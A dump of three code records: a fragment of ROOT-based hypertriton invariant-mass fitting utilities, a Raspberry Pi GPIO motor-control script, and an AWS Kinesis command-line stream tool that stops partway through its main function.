np.array(ctbins, 'double'))\n th2.SetDirectory(0)\n\n return th2\n\n\ndef h1_invmass(counts, cent_class, pt_range, ct_range, bins=45, name=''):\n th1 = TH1D(f'ct{ct_range[0]}{ct_range[1]}_pT{pt_range[0]}{pt_range[1]}_cen{cent_class[0]}{cent_class[1]}_{name}', '', bins, 2.96, 3.05)\n\n for index in range(0, len(counts)):\n th1.SetBinContent(index+1, counts[index])\n th1.SetBinError(index + 1, math.sqrt(counts[index]))\n\n th1.SetDirectory(0)\n\n return th1\n\n\ndef round_to_error(x, error):\n return round(x, -int(floor(log10(abs(error)))))\n\n\ndef get_ptbin_index(th2, ptbin):\n return th2.GetXaxis().FindBin(0.5 * (ptbin[0] + ptbin[1]))\n\n\ndef get_ctbin_index(th2, ctbin):\n return th2.GetYaxis().FindBin(0.5 * (ctbin[0] + ctbin[1]))\n\n\ndef fit_hist(\n histo, cent_class, pt_range, ct_range, nsigma=3, model=\"pol2\", fixsigma=-1, sigma_limits=None, mode=3, split =''):\n # canvas for plotting the invariant mass distribution\n cv = TCanvas(f'cv_{histo.GetName()}')\n\n # define the number of parameters depending on the bkg model\n if 'pol' in str(model):\n n_bkgpars = int(model[3]) + 1\n elif 'expo' in str(model):\n n_bkgpars = 2\n else:\n print(f'Unsupported model {model}')\n\n # define the fit function bkg_model + gauss\n fit_tpl = TF1('fitTpl', f'{model}(0)+gausn({n_bkgpars})', 0, 5)\n if model=='2pol1':\n fit_tpl = TF1('fitTpl', f'[0]+[1]*x+[2]*exp(-(x-[3])*(x-[3])/(2*[4]*[4]))', 0, 5)\n elif model=='2pol2':\n fit_tpl = TF1('fitTpl', f'[0]*exp(-[1]*x)+[2]*exp(-(x-[3])*(x-[3])/(2*[4]*[4]))', 0, 5)\n elif model=='2expo':\n fit_tpl = TF1('fitTpl', f'[0]+[1]*x+[2]*x*x+[3]*exp(-(x-[4])*(x-[4])/(2*[5]*[5]))', 0, 5)\n \n # redefine parameter names for the bkg_model\n for i in range(n_bkgpars):\n fit_tpl.SetParName(i, f'B_{i}')\n\n # define parameter names for the signal fit\n fit_tpl.SetParName(n_bkgpars, 'N_{sig}')\n fit_tpl.SetParName(n_bkgpars + 1, '#mu')\n fit_tpl.SetParName(n_bkgpars + 2, '#sigma')\n # define parameter values and limits\n fit_tpl.SetParameter(n_bkgpars, 40)\n fit_tpl.SetParLimits(n_bkgpars, 0.001, 10000)\n fit_tpl.SetParameter(n_bkgpars + 1, 2.9913)\n fit_tpl.SetParLimits(n_bkgpars + 1, 2.9905, 2.9927)\n\n # define signal and bkg_model TF1 separately\n sigTpl = TF1('fitTpl', 'gausn(0)', 0, 5)\n #sigTpl= TF1('fitTpl', '[0]*exp(-(x-[1])*(x-[1])/(2*[2]*[2]))', 0, 5)\n bkg_tpl = TF1('fitTpl', f'{model}(0)', 0, 5)\n\n # plotting stuff for fit_tpl\n fit_tpl.SetNpx(300)\n fit_tpl.SetLineWidth(2)\n fit_tpl.SetLineColor(2)\n # plotting stuff for bkg model\n bkg_tpl.SetNpx(300)\n bkg_tpl.SetLineWidth(2)\n bkg_tpl.SetLineStyle(2)\n bkg_tpl.SetLineColor(2)\n\n # define limits for the sigma if provided\n if sigma_limits != None:\n fit_tpl.SetParameter(n_bkgpars + 2, 0.5 *\n (sigma_limits[0] + sigma_limits[1]))\n fit_tpl.SetParLimits(n_bkgpars + 2, sigma_limits[0], sigma_limits[1])\n fit_tpl.SetParameter(n_bkgpars + 1, 2.9913)\n fit_tpl.SetParLimits(n_bkgpars + 1, 2.9905, 2.9925)\n # if the mc sigma is provided set the sigma to that value\n elif fixsigma > 0:\n fit_tpl.FixParameter(n_bkgpars + 2, fixsigma)\n # otherwise set sigma limits reasonably\n else:\n fit_tpl.SetParameter(n_bkgpars + 2, 0.002)\n fit_tpl.SetParLimits(n_bkgpars + 2, 0.001, 0.003)\n\n #print(fit_tpl.GetFormula())\n #x = input()\n ########################################\n # plotting the fits\n if mode == 2:\n ax_titles = ';m (^{3}He + #pi) (GeV/#it{c})^{2};Counts' + f' / {round(1000 * histo.GetBinWidth(1), 2)} MeV'\n if mode == 3:\n ax_titles = ';m (d + p + #pi) (GeV/#it{c})^{2};Counts' + f' / {round(1000 * histo.GetBinWidth(1), 2)} MeV'\n\n # invariant mass distribution histo and fit\n histo.UseCurrentStyle()\n histo.SetLineColor(1)\n histo.SetMarkerStyle(20)\n histo.SetMarkerColor(1)\n histo.SetTitle(ax_titles)\n histo.SetMaximum(1.5 * histo.GetMaximum())\n histo.Fit(fit_tpl, \"QRL\", \"\", 2.96, 3.05)\n\n histo.SetDrawOption(\"e\")\n histo.GetXaxis().SetRangeUser(2.96, 3.05)\n # represent the bkg_model separately\n bkg_tpl.SetParameters(fit_tpl.GetParameters())\n bkg_tpl.SetLineColor(600)\n bkg_tpl.SetLineStyle(2)\n bkg_tpl.Draw(\"same\")\n # represent the signal model separately\n sigTpl.SetParameter(0, fit_tpl.GetParameter(n_bkgpars))\n sigTpl.SetParameter(1, fit_tpl.GetParameter(n_bkgpars+1))\n sigTpl.SetParameter(2, fit_tpl.GetParameter(n_bkgpars+2))\n sigTpl.SetLineColor(600)\n # sigTpl.Draw(\"same\")\n\n # get the fit parameters\n mu = fit_tpl.GetParameter(n_bkgpars+1)\n muErr = fit_tpl.GetParError(n_bkgpars+1)\n sigma = fit_tpl.GetParameter(n_bkgpars+2)\n sigmaErr = fit_tpl.GetParError(n_bkgpars+2)\n signal = fit_tpl.GetParameter(n_bkgpars) / histo.GetBinWidth(1)\n errsignal = fit_tpl.GetParError(n_bkgpars) / histo.GetBinWidth(1)\n bkg = bkg_tpl.Integral(mu - nsigma * sigma, mu +\n nsigma * sigma) / histo.GetBinWidth(1)\n\n if bkg > 0:\n errbkg = math.sqrt(bkg)\n else:\n errbkg = 0\n # compute the significance\n if signal+bkg > 0:\n signif = signal/math.sqrt(signal+bkg)\n deriv_sig = 1/math.sqrt(signal+bkg)-signif/(2*(signal+bkg))\n deriv_bkg = -signal/(2*(math.pow(signal+bkg, 1.5)))\n errsignif = math.sqrt((errsignal*deriv_sig)**2+(errbkg*deriv_bkg)**2)\n else:\n signif = 0\n errsignif = 0\n\n # print fit info on the canvas\n pinfo2 = TPaveText(0.5, 0.5, 0.91, 0.9, \"NDC\")\n pinfo2.SetBorderSize(0)\n pinfo2.SetFillStyle(0)\n pinfo2.SetTextAlign(30+3)\n pinfo2.SetTextFont(42)\n\n string = f'ALICE Internal, Pb-Pb 2018 {cent_class[0]}-{cent_class[1]}%'\n pinfo2.AddText(string)\n \n decay_label = {\n \"\": ['{}^{3}_{#Lambda}H#rightarrow ^{3}He#pi^{-} + c.c.','{}^{3}_{#Lambda}H#rightarrow dp#pi^{-} + c.c.'],\n \"_matter\": ['{}^{3}_{#Lambda}H#rightarrow ^{3}He#pi^{-}','{}^{3}_{#Lambda}H#rightarrow dp#pi^{-}'],\n \"_antimatter\": ['{}^{3}_{#bar{#Lambda}}#bar{H}#rightarrow ^{3}#bar{He}#pi^{+}','{}^{3}_{#Lambda}H#rightarrow #bar{d}#bar{p}#pi^{+}'],\n }\n\n string = decay_label[split][mode-2]+', %i #leq #it{ct} < %i cm %i #leq #it{p}_{T} < %i GeV/#it{c} ' % (\n ct_range[0], ct_range[1], pt_range[0], pt_range[1])\n pinfo2.AddText(string)\n\n string = f'#mu {mu*1000:.2f} #pm {muErr*1000:.2f} MeV/c^{2}'\n pinfo2.AddText(string)\n\n string = f'#sigma {sigma*1000:.2f} #pm {sigmaErr*1000:.2f} MeV/c^{2}'\n pinfo2.AddText(string)\n if fit_tpl.GetNDF()>0:\n string = f'#chi^{2}/NDF {fit_tpl.GetChisquare()/fit_tpl.GetNDF():.2f} '\n pinfo2.AddText(string)\n\n string = f'Significance ({nsigma:.0f}#sigma) {signif:.1f} #pm {errsignif:.1f} '\n pinfo2.AddText(string)\n\n string = f'S2 ({nsigma:.0f}#sigma) {signal:.0f} #pm {errsignal:.0f}'\n pinfo2.AddText(string)\n\n string = f'B ({nsigma:.0f}#sigma) {bkg:.0f} #pm {errbkg:.0f}'\n pinfo2.AddText(string)\n\n if bkg > 0:\n ratio = signal/bkg\n string = f'S/B ({nsigma:.0f}#sigma) {ratio:.4f}'\n\n pinfo2.AddText(string)\n pinfo2.Draw()\n gStyle.SetOptStat(0)\n\n st = histo.FindObject('stats')\n if isinstance(st, TPaveStats):\n st.SetX1NDC(0.12)\n st.SetY1NDC(0.62)\n st.SetX2NDC(0.40)\n st.SetY2NDC(0.90)\n st.SetOptStat(0)\n\n histo.Write()\n cv.Write()\n\n return (signal, errsignal, signif, errsignif, mu, muErr, sigma, sigmaErr)\n return (signal, errsignal, signif, errsignif, sigma, sigmaErr)\n\n\ndef load_mcsigma(cent_class, pt_range, ct_range, mode, split=''):\n info_string = f'_{cent_class[0]}{cent_class[1]}_{pt_range[0]}{pt_range[1]}_{ct_range[0]}{ct_range[1]}{split}'\n sigma_path = os.environ['HYPERML_UTILS_{}'.format(mode)] + '/FixedSigma'\n\n file_name = f'{sigma_path}/sigma_array{info_string}.npy'\n\n return np.load(file_name, allow_pickle=True)\n\n\ndef rename_df_columns(df):\n rename_dict = {}\n\n for col in df.columns:\n\n if col.endswith('_f'):\n rename_dict[col] = col[:-2]\n \n df.rename(columns = rename_dict, inplace=True)\n\ndef df2roo(df, observables=None, columns=None, name='data', weights=None, ownership=True, bins=None,\n norm_weights=True):\n \"\"\" Convert a DataFrame into a RooDataSet\n The `column` parameters select features of the DataFrame which should be included in the RooDataSet.\n\n Args:\n df (DataFrame or array) :\n Input data to be transformed to a RooDataSet\n observables (dict) :\n Dictionary of observables to convert data with the correct range of the observables of interest\n columns (:obj:`list` of :obj:`str`, optional) :\n List of column names of the DataFrame\n name (:obj:`str`)\n Name of the Dataset should be unique to avoid problems with ROOT\n weights (:obj:`str` or array, optional) :\n Name or values of weights to assign weights to the RooDataSet\n ownership (bool, optional) :\n Experimental, True for ROOT garbage collection\n bins (int):\n creates RooDataHist instead with specified number of bins\n norm_weights (bool) :\n Normalise weights to sum of events\n\n Returns:\n RooDataSet : A conversion of the DataFrame\n\n Todo:\n * Get rid of either columns or observables\n * Allow observables to be list or dict\n \"\"\"\n\n # Return DataFrame object\n if isinstance(df, ROOT.RooDataSet):\n return df\n\n # TODO Convert Numpy Array\n if not isinstance(df, pd.DataFrame):\n print(\"Did not receive DataFrame\")\n assert observables is not None, \"Did not receive an observable \"\n assert len(observables) == 1, \"Can only handle 1d array, use pd.DataFrame instead\"\n assert len(np.array(df).shape) == 1, \"Can only handle 1d array, use pd.DataFrame instead\"\n d = {list(observables.keys())[0]: np.array(df)}\n df = pd.DataFrame(d)\n\n assert isinstance(df, pd.DataFrame), \"Something in the conversion went wrong\"\n\n # Gather columns in the DataFrame to be included in the rooDataSet\n if columns is None:\n if observables is not None:\n columns = [observables[v].GetName() for v in observables]\n if columns is not None:\n for v in columns:\n assert v in df.columns, \"Variable %s not in DataFrame\" % v\n else:\n columns = df.columns\n\n df_subset = df[columns]\n\n # Add weights into roofit format\n if weights is not None:\n if isinstance(weights, str):\n df_subset['w'] = df[weights]\n else:\n assert len(weights) == len(df), \"Strange length of the weights\"\n df_subset['w'] = weights\n # Check if weights are normalized\n w = df_subset['w']\n if norm_weights:\n if len(w) != int(np.sum(w)):\n df_subset['w'] *= len(w)/float(np.sum(w))\n\n # Check for NaN values\n if df_subset.isnull().values.any():\n df_subset = df_subset.dropna()\n print(\"NaN Warning\")\n\n # WARNING: possible memory leak\n df_tree = array2tree(df_subset.to_records())\n ROOT.SetOwnership(df_tree, ownership)\n\n roo_argset = ROOT.RooArgSet()\n roo_var_list = [] # Hast to exist due to the python2 garbage collector\n\n # If no observables are passed, convert all columns and create dummy variables\n if observables is None:\n for c in columns:\n v = ROOT.RooRealVar(c, c, df_subset[c].mean(), df_subset[c].min(), df_subset[c].max(), )\n roo_var_list.append(v)\n\n roo_argset.add(v)\n else:\n for v in observables:\n roo_argset.add(observables[v])\n roo_var_list.append(observables[v])\n\n # Create final roofit data-set\n if weights is not None:\n w = ROOT.RooRealVar('w', 'Weights', df_subset['w'].mean(), df_subset['w'].min(), df_subset['w'].max(), )\n roo_argset.add(w)\n roo_var_list.append(w)\n df_roo = ROOT.RooDataSet(name, name, roo_argset, ROOT.RooFit.Import(df_tree), ROOT.RooFit.WeightVar(w),)\n else:\n df_roo = ROOT.RooDataSet(name, name, roo_argset, ROOT.RooFit.Import(df_tree),)\n ROOT.SetOwnership(df_roo, ownership)\n\n # Experimental: return histogram data if bins are set\n if bins is not None:\n return roo2hist(df_roo, bins, roo_var_list[0], name, roo_argset)\n\n return df_roo\n\ndef roo2hist(roo, binning, obs, name, observables=None):\n \"\"\" Convert data to a histogram\n\n Args:\n roo (ROOT.RooAbsData):\n Dataset to be binned\n binning (int):\n Number of bins\n obs (ROOT.RooAbsReal):\n Observable(s) to be binned\n name (str):\n Name of the resulting histogram\n observables (ROOT.RooArgSet):\n Set of observables\n\n Returns:\n hist (ROOT.RooDataHist) Binned data\n\n \"\"\"\n\n obs.setBins(binning)\n\n if observables is None:\n observables = ROOT.RooArgSet()\n observables.add(obs)\n\n hist = ROOT.RooDataHist(name, \"Data Hist\", observables, roo)\n\n return hist\n","sub_path":"common/TrainingAndTesting/hyp_analysis_utils.py","file_name":"hyp_analysis_utils.py","file_ext":"py","file_size_in_byte":18011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"368074405","text":"import RPi.GPIO as gpio\nimport time\n#curses is used to capture the keyboard input\nimport curses\n\nclass Propulsion(object):\n\n def init(self):\n\n gpio.setwarnings(False)\n\n #Set the pinmode to BCM\n gpio.setmode(gpio.BCM)\n\n #init the curses screen\n self.stdscr = curses.initscr()\n\n #use cbreak to not require a return key press\n curses.cbreak()\n self.quit=False\n\n self.speed1 = 30\n self.speed2 = 30\n\n def resetGpio(self):\n gpio.setmode(gpio.BCM)\n gpio.setup(18, gpio.OUT)\n gpio.setup(13, gpio.OUT)\n #Set pulse modulation to 50hz for pin 18 and 13 and store that initialization in a va$\n self.pwm1 = gpio.PWM(18, 50)\n self.pwm2 = gpio.PWM(13, 50)\n #Start the pwm at 0% duty cycle\n self.pwm1.start(0)\n self.pwm2.start(0)\t\n gpio.setup(17, gpio.OUT)\n gpio.setup(22, gpio.OUT)\n gpio.setup(23, gpio.OUT)\n gpio.setup(24, gpio.OUT)\n gpio.setup(18, gpio.OUT)\n gpio.setup(13, gpio.OUT)\n self.pwm1.ChangeDutyCycle(self.speed1)\n self.pwm2.ChangeDutyCycle(self.speed2)\n\t\n def forward(self, tf):\n self.resetGpio()\n print(\"inching forward with speed \"+ str(self.speed1))\n gpio.output(17, True)\n gpio.output(22, False)\n gpio.output(23, True)\n gpio.output(24, False)\n time.sleep(tf)\n gpio.cleanup()\n\n def reverse(self, tf):\n self.resetGpio()\n print(\"awkwardly backing away with speed \"+ str(self.speed1))\n gpio.output(17, False)\n gpio.output(22, True)\n gpio.output(23, False)\n gpio.output(24, True)\n time.sleep(tf)\n gpio.cleanup()\n\n def left(self, tf):\n self.resetGpio()\n print(\"squeezing left speed \"+ str(self.speed1))\n gpio.output(17, False)\n gpio.output(22, False)\n gpio.output(23, True)\n gpio.output(24, False)\n time.sleep(tf)\n gpio.cleanup()\n\n def right(self, tf):\n self.resetGpio()\n print(\"squeezing left speed \"+ str(self.speed1))\n gpio.output(17, True)\n gpio.output(22, False)\n gpio.output(23, False)\n gpio.output(24, False)\n time.sleep(tf)\n gpio.cleanup()\n\n def start(self):\n try:\n while quit!=True:\n print (\"waiting for input...\")\n #get the entered characters\n c = self.stdscr.getch()\n #dont know what this line does tbh\n curses.endwin()\n if curses.keyname(c)==\"w\" :\n self.forward(2)\n elif curses.keyname(c)==\"s\" :\n self.reverse(2)\n elif curses.keyname(c)==\"l\" :\n self.left(1)\n elif curses.keyname(c)==\"r\" :\n self.right(1)\n elif curses.keyname(c)==\"u\" and self.speed1 <= 90:\n self.speed1 += 10 \n self.speed2 += 10\n elif curses.keyname(c)==\"d\" and self.speed1 >= 40:\n self.speed1 -= 10\n self.speed2 -= 10\n #print curses.keyname(c),\n # if curses.keyname(c)==\"q\" :\n # quit=True\n except KeyboardInterrupt:\n self.pwm.stop()\n gpio.cleanup()\n \n def stop(self):\n self.resetGpio()\npropulsion = Propulsion()\npropulsion.init()\npropulsion.start()\n\n\n\n\n\n\n","sub_path":"motorCode/pwmDC2.py","file_name":"pwmDC2.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"388119697","text":"#!/usr/bin/env python3\n\nimport argparse\nimport base64\nimport gzip\nimport json\nimport logging\nimport os\nimport random\nimport sys\nimport time\nimport traceback\nimport datetime\nfrom itertools import starmap\nfrom typing import List, Dict\n\nimport boto3\n\n_ACTION_LIST_STREAMS = 'list-streams'\n_ACTION_PUT_RECORDS = 'put-records'\n_ACTION_PUT_DATA = 'put-data'\n_ACTION_GET_RECORDS = 'get-records'\n_ACTION_PRINT_DATA = 'print-data'\n_ACTION_DUMP_DATA = 'dump-data'\nHUMAN_READABLE_TIME_FORMAT = '%Y-%m-%d %H.%M.%S.%f %z'\n\nlogger = logging.getLogger(__name__)\nlogging.captureWarnings(True)\n\n\ndef logger_init(logging_h: logging.Logger):\n common_log_format = '[%(asctime)s:%(name)s:%(levelname)s:%(process)d] %(message)s'\n console_handler = logging.StreamHandler()\n console_formatter = logging.Formatter(\n fmt=common_log_format,\n datefmt='%Y%m%d:%H%M%S'\n )\n console_handler.setFormatter(console_formatter)\n logging_h.handlers = [console_handler]\n\n\ndef json_serial(obj):\n \"\"\"JSON serializer for objects not serializable by default json code\"\"\"\n\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.isoformat()\n if isinstance(obj, bytes):\n return str(base64.b64encode(obj))\n raise TypeError(\"Type %s not serializable\" % type(obj))\n\n\ndef chunker(seq, size):\n for i in range(0, len(seq), size):\n yield seq[i:i + size]\n\n\nclass KinesisManager:\n def __init__(self, aws_profile: str = None):\n self.aws_profile_name = aws_profile\n self.kinesis = self.init_kinesis_client()\n self.time_to_sleep = 1\n\n def init_kinesis_client(self):\n if self.aws_profile_name:\n aws_session = boto3.session.Session(profile_name=self.aws_profile_name)\n return aws_session.client('kinesis')\n else:\n return boto3.client('kinesis')\n\n def list_streams(self):\n for stream in self.kinesis.list_streams()['StreamNames']:\n print(stream)\n\n def put_records_wrapper(self, records: List[dict], stream: str):\n try:\n upload_result = self.kinesis.put_records(Records=records, StreamName=stream)\n except Exception as e:\n logger.warning(f'{e}. Chilling out for 61 seconds. Resending.')\n time.sleep(61)\n upload_result = self.kinesis.put_records(Records=records, StreamName=stream)\n if upload_result['FailedRecordCount'] != 0:\n error_cause = upload_result.get('Records', [{}])[-1].get('ErrorMessage', 'Undefined')\n logger.error(f'Something went wrong while sending data. Resending, last try. Caused by: {error_cause}')\n time.sleep(61)\n self.kinesis.put_records(Records=records, StreamName=stream)\n\n def put_files(self, directory, stream):\n records = []\n for file in os.listdir(directory):\n if file.endswith('.json'):\n with open(os.path.join(directory, file)) as fd:\n payload = fd.read()\n records.append(gzip.compress(payload.encode('utf-8')))\n logger.debug(f'File added: {file}')\n self.data_upload(stream, records, True)\n\n def data_upload(self, stream: str, data: list, compressed: bool, no_sleep: bool = False):\n shards_count = len(self.kinesis.describe_stream(StreamName=stream)['StreamDescription']['Shards'])\n compressed_records = []\n for data_entry in data:\n if compressed:\n compressed_entry = data_entry\n else:\n compressed_entry = gzip.compress(json.dumps(data_entry).encode('utf-8'))\n part_key = f'{random.randrange(1024)}_{random.randrange(1024)}'\n compressed_records.append({'Data': compressed_entry, 'PartitionKey': part_key})\n\n # Kinesis put records can handle only 500 records per batch\n for records_chunk in chunker(compressed_records, 500 * shards_count):\n batch_to_send = []\n batch_size = 0\n for record in records_chunk:\n record_size = sys.getsizeof(record['Data']) + sys.getsizeof(record['PartitionKey'])\n if batch_size + record_size >= 1000000 * shards_count:\n logger.info(f'Batch is full: {len(batch_to_send)} records ({batch_size / 1024:.2f} KiB). Sending')\n self.put_records_wrapper(batch_to_send, stream)\n batch_to_send.clear()\n batch_size = 0\n batch_to_send.append(record)\n batch_size += record_size\n logger.info(f'Sleeping for {self.time_to_sleep} seconds')\n time.sleep(self.time_to_sleep)\n else:\n logger.debug(f'Batch has {len(batch_to_send)} records ({batch_size / 1024:.2f} KiB). Adding')\n batch_to_send.append(record)\n batch_size += sys.getsizeof(record['Data']) + sys.getsizeof(record['PartitionKey'])\n # Sending final batch if there is something left\n if batch_to_send:\n logger.info(f'Batch is ready: {len(batch_to_send)} records ({batch_size / 1024:.2f} KiB). Sending')\n self.put_records_wrapper(batch_to_send, stream)\n if not no_sleep:\n logger.info(f'Sleeping for {self.time_to_sleep} seconds')\n time.sleep(self.time_to_sleep)\n\n def get_data(self, stream, shard_iterator_type, destination: str):\n for shard in self.kinesis.list_shards(StreamName=stream)['Shards']:\n shard_it = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard['ShardId'],\n ShardIteratorType=shard_iterator_type\n )\n print(\"Process shard:\", shard['ShardId'])\n for record in self.kinesis.get_records(ShardIterator=shard_it['ShardIterator'])['Records']:\n print(\"Process: \", record['PartitionKey'], record['SequenceNumber'])\n with open(\"{output_folder}/{partition_key}-{record_id}.json\".format(\n output_folder=destination,\n partition_key=record['PartitionKey'],\n record_id=record['SequenceNumber']\n ), 'wb') as fd:\n data = record.get('Data')\n payload = gzip.decompress(data)\n fd.write(payload)\n\n def get_records_generator(self, stream, sh_t, shard: str, shard_iterator: str, no_linger: bool = False,\n raw_data: bool = False):\n logger.debug(f'get_records_generator created with parameters: {shard}, no_linger = {no_linger}')\n sleep_between_queries = 1\n records_per_batch = 1000\n last_pos = 0\n while shard_iterator:\n try:\n kinesis_answer = self.kinesis.get_records(Limit=records_per_batch, ShardIterator=shard_iterator)\n shard_iterator = kinesis_answer.get('NextShardIterator')\n if len(kinesis_answer['Records']) > 0:\n sleep_between_queries = 1\n records_per_batch = 1000\n for record in kinesis_answer.get('Records', []):\n compressed_payload = record['Data']\n sequence_number = int(record['SequenceNumber'])\n date_of_arrival = record['ApproximateArrivalTimestamp']\n if raw_data:\n record_data = compressed_payload\n else:\n try:\n record_data = gzip.decompress(compressed_payload).decode('utf-8')\n except OSError as e:\n logger.error(f'Non-gzipped data received from the stream. Ignoring:\\n{e}')\n continue\n payload = {\n 'data': record_data,\n 'shard_id': shard,\n 'sequence_number': sequence_number,\n 'date_of_arrival': date_of_arrival\n }\n yield payload\n last_pos = sequence_number\n if len(kinesis_answer['Records']) == 0 and kinesis_answer['MillisBehindLatest'] == 0 and no_linger:\n logger.info(f'No more data in shard {shard}. Stopping')\n shard_iterator = None\n return\n elif len(kinesis_answer['Records']) == 0:\n logger.debug(f'No data in {shard} Yielding from generator to allow aggregator check other shards')\n sleep_between_queries = 0.4\n records_per_batch = 10000\n yield {}\n logger.debug(f'Sleeping for {sleep_between_queries} seconds')\n time.sleep(sleep_between_queries)\n except self.kinesis.exceptions.ProvisionedThroughputExceededException as e:\n logger.warning(f'Kinesis throughput exceeded. Chilling for 6 seconds. Specifics:\\n{e}')\n sleep_between_queries += 0.05\n time.sleep(6)\n except self.kinesis.exceptions.ExpiredIteratorException as e:\n logger.warning('ExpiredIteratorException. Obtaining new iterator: {}'.format(e))\n try:\n shard_iterator = self.get_iterator(stream, shard, sh_t, last_pos)\n except Exception as e:\n logger.warning(f'Unable to acquire shard iterator. Will try again. {e}')\n except Exception as e:\n logger.warning(\n 'Unexpected error while polling Kinesis stream for data: {}. Traceback:\\n {}'.format(\n e, '\\r'.join(traceback.format_tb(e.__traceback__))\n )\n )\n logger.info('Reinitializing Kinesis client and trying to reacquire shard iterator...')\n time.sleep(6)\n try:\n self.kinesis = self.init_kinesis_client()\n shard_iterator = self.get_iterator(stream, shard, sh_t, last_pos)\n except Exception as e:\n logger.warning(f'Unable to acquire shard iterator. Will try again. {e}')\n\n def get_iterator(self, stream: str, shard: str, iterator_type: str = None, position=None):\n ts = None\n sn = None\n if (iterator_type == 'AT_SEQUENCE_NUMBER' or iterator_type == 'AFTER_SEQUENCE_NUMBER') and position:\n sn = str(position)\n elif 'AT_TIMESTAMP' and position:\n if isinstance(position, datetime.datetime):\n ts = position\n else:\n # There is supposedly a time-representative stream-position information\n if ((isinstance(position, str) and position.replace('.', '', 1).isdigit())\n or isinstance(position, (int, float))):\n try:\n ts = datetime.datetime.utcfromtimestamp(float(position))\n except Exception as e:\n logger.info('Unsuccessfully tried to parse stream timestamp from {}. {}'.format(position, e))\n else:\n try:\n ts = datetime.datetime.strptime(position, HUMAN_READABLE_TIME_FORMAT)\n except Exception as e:\n logger.info('Unsuccessfully tried to parse stream timestamp from {}. {}'.format(position, e))\n if sn:\n logger.info('Acquiring iterator of type {} from {}'.format(iterator_type, sn))\n iterator = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard,\n ShardIteratorType=iterator_type,\n StartingSequenceNumber=sn\n )['ShardIterator']\n elif iterator_type == 'AT_TIMESTAMP' and ts:\n logger.info('Acquiring iterator of type {} from {}'.format(iterator_type, ts))\n iterator = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard,\n ShardIteratorType=iterator_type,\n Timestamp=ts\n )['ShardIterator']\n elif iterator_type == 'LATEST':\n logger.info('Acquiring iterator of type {}'.format(iterator_type))\n iterator = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard,\n ShardIteratorType=iterator_type\n )['ShardIterator']\n else:\n # 'TRIM_HORIZON'\n logger.info('Acquiring iterator of type {}'.format('TRIM_HORIZON'))\n iterator = self.kinesis.get_shard_iterator(\n StreamName=stream,\n ShardId=shard,\n ShardIteratorType='TRIM_HORIZON'\n )['ShardIterator']\n return iterator\n\n def data_feed(self, stream: str, shard_iterator_type: str, no_linger: bool,\n shards: Dict[str, Dict[str, int]] = None, no_decompress: bool = False) -> List[dict]:\n valid_shards = 0\n # Even if there is a shards dict provided, there could be new shards present in the stream.\n for shard_d in self.kinesis.list_shards(StreamName=stream)['Shards']:\n if not shards:\n shards = {shard_d['ShardId']: {}}\n elif shard_d['ShardId'] not in shards:\n # Adding newly discovered shard to the shards dictionary.\n shards[shard_d['ShardId']] = {}\n for shard, specs in shards.items():\n pos = specs.get('starting_sequence_number') or specs.get('date_of_arrival')\n try:\n if pos:\n shards[shard]['shard_iterator'] = self.get_iterator(\n stream,\n shard,\n iterator_type=shard_iterator_type,\n position=specs.get('starting_sequence_number')\n )\n else:\n shards[shard]['shard_iterator'] = self.get_iterator(\n stream,\n shard,\n iterator_type=shard_iterator_type\n )\n valid_shards += 1\n except self.kinesis.exceptions.ResourceNotFoundException:\n logger.warning(f'Tried to get iterator for a closed shard {shard}. Skipping.')\n continue\n except Exception as e:\n logger.error(f'Unexpected error while trying to obtain iterator for {shard}. Skipping. {e}')\n continue\n if valid_shards == 0:\n logger.error('Something went terribly wrong, there are not any shard iterators obtained.')\n return\n logger.debug('data_feed routine. Setup code end')\n shard_pollers = []\n shard_pollers.extend(starmap(\n self.get_records_generator,\n [\n (stream, shard_iterator_type, s, shards[s]['shard_iterator'], no_linger, no_decompress)\n for s in shards.keys() if shards[s].get('shard_iterator')\n ]\n ))\n while shard_pollers:\n for generator in shard_pollers:\n try:\n retrieved_record = generator.__next__()\n if retrieved_record:\n yield retrieved_record\n else:\n continue\n except StopIteration:\n logger.debug(f'data_feed routine. Generator for shard exhausted. Removing it from the cycle.')\n shard_pollers.remove(generator)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--debug', action='store_true')\n sp = parser.add_subparsers(dest='action')\n\n sp.add_parser(_ACTION_LIST_STREAMS, help='list available streams')\n\n sp_put = sp.add_parser(_ACTION_PUT_RECORDS, help='put records from directory to Kinesis stream')\n sp_put.add_argument('--stream-name', help='stream name', required=True)\n sp_put.add_argument('--files', help='path to files', required=True)\n\n sp_up = sp.add_parser(_ACTION_PUT_DATA, help='Upload json data to Kinesis stream')\n sp_up.add_argument('--stream-name', help='stream name', required=True)\n sp_up.add_argument('data', help='Data to send. Should be a string with array of valid json objects\\n'\n 'e.g.: -------------------------------------------------'\n '[{\"EvInfo\":{\"EventId\":\"176\"}},{\"EvInfo\":{\"EventId\":\"177\"}}]')\n\n sp_get = sp.add_parser(_ACTION_GET_RECORDS, help='OUTDATED! Write records from Kinesis stream as files.')\n sp_get.add_argument('--stream-name', help='stream name', required=True)\n sp_get.add_argument('--shard-iterator-type', help='shard iterator type', choices=['LATEST', 'TRIM_HORIZON'])\n sp_get.add_argument('--output', help='output folder')\n\n sp_print = sp.add_parser(_ACTION_PRINT_DATA, help='Print Kinesis stream data to stdout.')\n sp_print.add_argument('--stream-name', help='stream name', required=True)\n sp_print.add_argument('--shard-iterator-type', help='shard iterator type', choices=['LATEST', 'TRIM_HORIZON'],\n default='LATEST')\n sp_print.add_argument('--no-linger', action='store_true',\n help='If selected - stop after all data from the stream has been received')\n\n sp_dump = sp.add_parser(_ACTION_DUMP_DATA, help='Dump Kinesis stream data to folder.')\n sp_dump.add_argument('--stream-name', help='stream name', required=True)\n sp_dump.add_argument('--shard-iterator-type', help='shard iterator type', choices=['LATEST', 'TRIM_HORIZON'],\n default='LATEST')\n sp_dump.add_argument('--no-linger', action='store_true',\n help='If selected - stop after all data from the stream has been received')\n sp_dump.add_argument('--output', help='output folder')\n\n args = parser.parse_args()\n\n if 'debug' not in args:\n args.debug = False\n if args.debug:\n logger.setLevel('DEBUG')\n else:\n 